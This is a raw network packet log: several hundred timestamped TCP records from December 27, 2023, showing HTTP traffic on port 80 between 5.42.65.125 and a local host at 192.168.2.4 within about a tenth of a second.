Dec 27, 2023 17:57:25.265737057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.265785933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.266582966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.266598940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.266657114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.267446041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.267460108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.267509937 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.268254995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.268269062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.268537045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.269088984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.269104958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.269159079 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.269931078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.269944906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.269989967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.270807981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.270823002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.270919085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.271686077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.271699905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.271807909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.272452116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.272465944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.272633076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.273314953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.273329973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.273376942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.274210930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.274225950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.274267912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.275029898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.275043964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.275096893 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.275948048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.275964022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.276027918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.276699066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.276717901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.276896954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.277573109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.277586937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.277637959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.278482914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.278497934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.279020071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.279252052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.279266119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.280025959 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.280107021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.280122042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.280527115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.280940056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.280951977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.281011105 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.281793118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.281809092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.281861067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.282661915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.282676935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.282718897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.283453941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.283489943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.283548117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.284421921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.284435034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.284498930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.285213947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.285233021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.286039114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.286052942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.286097050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.286132097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.286932945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.286947966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.287044048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.287759066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.287774086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.287826061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.288681984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.288697004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.288769007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.289383888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.289459944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.289509058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.290213108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.290229082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.290281057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.291119099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.291131973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.291182995 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.292005062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.292083979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.292665958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.292758942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.292860031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.292905092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.293606043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.293648005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.294523954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.294538021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.294572115 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.294601917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.295351982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.295367002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.295409918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.296300888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.296314955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.296375036 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.297025919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.297040939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.297103882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.297945023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.297960043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.298005104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.298748016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.298762083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.298826933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.299612045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.299627066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.299679041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.300453901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.300470114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.300537109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.301261902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.301279068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.301336050 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.302059889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.302074909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.302124977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.302944899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.302980900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.303771973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.303785086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.303818941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.303880930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.304667950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.304682970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.304728985 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.305489063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.305504084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.305560112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.306365967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.306433916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.307003975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.307490110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.307504892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.307559967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.307984114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.307997942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.308047056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.308847904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.308902979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.309758902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.309773922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.309807062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.309842110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.310595989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.310611010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.310655117 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.311402082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.311415911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.311467886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.312217951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.312263966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.313054085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.313069105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.313110113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.313138008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.313905954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.313944101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.313987970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.314794064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.314807892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.314868927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.315596104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.315635920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.315680981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.316457987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.316499949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.317337036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.317377090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.317409039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.317445040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.318295002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.318322897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.318991899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.323997974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.324239016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.324287891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.324310064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.325088024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.325109005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.325138092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.325928926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.325965881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.325968981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.326780081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.326797009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.326848030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.328794003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.328836918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.328891993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.331394911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.331413031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.331470966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.333388090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.333410025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.333436966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.333821058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.333844900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.333870888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.334610939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.334652901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.334697008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.335429907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.335447073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.335489988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.335827112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.336333990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.336354017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.336404085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.337243080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.337260962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.337292910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.338051081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.338068962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.338100910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.338895082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.338912010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.338953018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.339708090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.339725018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.339756012 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.340519905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.340538025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.340569973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.341418028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.341439962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.341475010 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.342175961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.342222929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.342300892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.343065977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.343081951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.343126059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.343914986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.343961000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.343976021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.344762087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.344805002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.344850063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.345601082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.345621109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.345645905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.346438885 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.346457958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.346481085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.347395897 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.347417116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.347457886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.348114014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.348160028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.348578930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.348593950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.349617004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.349634886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.349666119 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.349714994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.350343943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.350358963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.350403070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.351169109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.351186037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.351231098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.351989985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.352008104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.352057934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.352834940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.352849007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.352895975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.353332996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.353914022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.353929996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.353977919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.354507923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.354532957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.354989052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.355391979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.355428934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.355465889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.356240988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.356257915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.357449055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.357475042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.357496977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.357534885 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.357882977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.357897043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.357953072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.358685970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.358700991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.358746052 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.359777927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.359792948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.359848022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.360821962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.360835075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.360877991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.361402035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.361452103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.361464977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.362464905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.362481117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.362536907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.362828970 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.363981009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.364104986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.364151001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.364155054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.364499092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.364514112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.364553928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.364768982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.365345955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.365394115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.365473032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.366240025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.366256952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.366285086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.367122889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.367140055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.367192984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.367935896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.367949963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.367990971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:25.368768930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.368786097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:25.368814945 CET	49738	80	192.168.2.4	5.42.65.125
